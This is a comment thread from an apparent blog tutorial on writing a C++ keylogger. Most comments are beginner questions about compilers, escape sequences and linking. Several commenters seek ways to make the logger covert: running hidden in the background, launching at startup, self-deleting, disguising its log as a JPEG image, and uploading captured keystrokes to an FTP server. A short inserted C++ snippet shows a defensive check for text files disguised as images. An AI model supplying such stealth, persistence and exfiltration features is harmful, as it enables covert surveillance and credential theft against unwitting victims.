    2. There is nothing about C++ on your blog, only about batch, and again I ask you, how can you know about C++ without knowing what a compiler does?

    3. YOU CAN NEVER MAKE CODE INTO AN EXE by typing .exe at the end... That defies the very basics of software.

    4. Batch, or what you call "MS-DOS" commands, isn't even a language; it's just a bunch of commands that your operating system knows, and the OS kind of acts like a compiler.

  29. I was told (in over 60 sources and 2 programming books, and by 1 Microsoft employee) that batch was written in C++, and isn't it also possible to use a .bat_to_.exe converter? (or is that considered a type of compiler?)

    Thanks for your help, I've learned and re-learned a lot today.......
    Random question: do you know what the difference is between a *.txt file and a *.cpp file? (My computer reads them both as text files, but what's the difference?)

  30. OK, there was a miscommunication error with my source; he unintentionally blended two different sources together and confused me.
    I want to thank you for helping me see this error and helping to clarify it :)
    I still look forward to more keylogger posts (is there a way to make the logger 'uninstall/delete' itself at a certain date and/or time? If there is, could you include it in the next post?)

  31. In the code, in the places where it's saying where storekey.txt is, why does it say C:\\storekey.txt? Shouldn't there be only one backslash? Because there is no C:\\ on my comp (winXP), there's a C:\. Or is it supposed to be that way? Please elaborate.

  32. Please be kind enough to answer my query. Would really appreciate it. I only have one barrier to be breached before I can have the keylogger up and running. Please help me badfish303.

  33. tech.nerd.no: in C++ there are escape sequences: a backslash \ followed by a letter. However, if you want a regular backslash to appear in some sort of output, you need the double backslash \\. This outputs a single backslash. Similarly, if you need to output a quote you have to do cout << " He said, \"Hello World!\" to the man." << endl;

  34. I have a request...
    could you reorder the code so that it reads in the order it is processed?

    and... are you still alive? Will you continue the project?

  35. Yes, I'm still alive, and I am working on this project.

    I'm not sure I understand your request.

  36. Ah, never mind, I just had some problems understanding the code, but am on my way now =p

    Am glad you are still there xD

  37. I totally had an innovation for this keylogger....
    you could make the 'log file' into what some call a "crate"... For anyone who's wondering: a crate is a text file that is saved in the format of a picture... Earlier today I changed the script to save the 'log file' as a jpeg image, and it worked!!!:P So I think this is a good way to increase security since the file is saved on the root of the C drive and is perfectly accessible

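Renaming a text log to .jpg, as comment 37 describes, changes only the file name, so a content check still identifies it. The C++ check below is an added example (not code from the post or its comments); the name storekey.jpg, the sample bytes and the 0.95 printable-byte threshold are assumptions constructed for illustration.

```cpp
#include <algorithm>
#include <cctype>
#include <iostream>
#include <string>
#include <vector>

enum class Verdict { NotJpegName, ValidJpeg, TextDisguisedAsJpeg, UnknownContent };

// True when the file name ends in .jpg or .jpeg (case-insensitive).
static bool hasJpegExtension(std::string name) {
    std::transform(name.begin(), name.end(), name.begin(),
                   [](unsigned char c) { return static_cast<char>(std::tolower(c)); });
    auto endsWith = [&name](const std::string& s) {
        return name.size() >= s.size() &&
               name.compare(name.size() - s.size(), s.size(), s) == 0;
    };
    return endsWith(".jpg") || endsWith(".jpeg");
}

// Fraction of bytes that are printable ASCII or common whitespace.
static double printableRatio(const std::vector<unsigned char>& data) {
    if (data.empty()) return 0.0;
    std::size_t printable = 0;
    for (unsigned char b : data)
        if ((b >= 0x20 && b <= 0x7E) || b == '\n' || b == '\r' || b == '\t') ++printable;
    return static_cast<double>(printable) / static_cast<double>(data.size());
}

// Compare what the name claims with what the leading bytes actually are.
Verdict classify(const std::string& name, const std::vector<unsigned char>& head) {
    if (!hasJpegExtension(name)) return Verdict::NotJpegName;
    // A JPEG stream starts with the SOI marker FF D8, then another FF marker byte.
    if (head.size() >= 3 && head[0] == 0xFF && head[1] == 0xD8 && head[2] == 0xFF)
        return Verdict::ValidJpeg;
    // No signature: mostly printable bytes means text under an image name.
    return printableRatio(head) >= 0.95 ? Verdict::TextDisguisedAsJpeg
                                        : Verdict::UnknownContent;
}

// Constructed sample: plain-text log content (illustrative, not from the page).
std::vector<unsigned char> sampleText() {
    const std::string s = "[ENTER]hello world[TAB]user1\r\n";
    return std::vector<unsigned char>(s.begin(), s.end());
}

int main() {
    bool hit = classify("storekey.jpg", sampleText()) == Verdict::TextDisguisedAsJpeg;
    std::cout << (hit ? "flag: text under a .jpg name\n" : "no finding\n");
}
```

In a real sweep, `head` would be the first few hundred bytes read from each .jpg/.jpeg file on disk.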
  38. Thank you Badfish!

    I'm following your blog with great interest.

    I didn't know the difference between sockets and the wininet library, so that was a great thing to explain in your tutorial.

    Is it really a good idea to always close the file:
    storekey.close();
    Wouldn't it be better to just flush it:
    storekey.flush();

    Have a great day!

  39. What's the use of this, after connect?
    Is it an error?

    recv(FSoc, servermessage, sizeof(servermessage),0);

  40. Greetings badfish,

    I liked your tutorial much and as far as I know this is one of the most recent about hand-made keylogging. Thank you for the time spent here.

    However, for any keylogger to be successful it must be hard to detect. You were writing about that a few times. I've read all your posts about that and as far as you are in code, this program is completely visible as a black cpp console window. It would be really cool if it ran as a background process. Is it possible to do?

    And second thing, if you don't have an idea what to add more: it would be rather necessary for your keylogger to run on system start. I know all the stuff with regedit using batch. Is there a way to implement it in cpp code?

    Keep up the good work, there are many more people reading it than you think (as far as I know). They are just too lazy to even comment :P
    Have a nice day.

  41. Ah, sorry for the 'second thing'. I didn't notice it was written at the end.

  42. damn good tutorial badfish u iz a bad mofu*ka ima write a song about you it goes

    badfish ;music; badfish is a bad mofu*ka...it's a work in progress...

    keep up the good work

  43. I have a problem, please help me.
    The keylogger uploads an empty file to the ftpserver. I don't know what is the matter?
    How many files need to be written to the storekey.txt so the file can be uploaded to an ftp server? Or should letters be uploaded one by one?
    Help me please!!!

  44. Is this still alive? I just made a keylogger & it works perfectly.. but having some doubts..
    Can you help me?

  45. If you use Visual Studio 2008, add ws2_32.lib to "additional library dependencies".
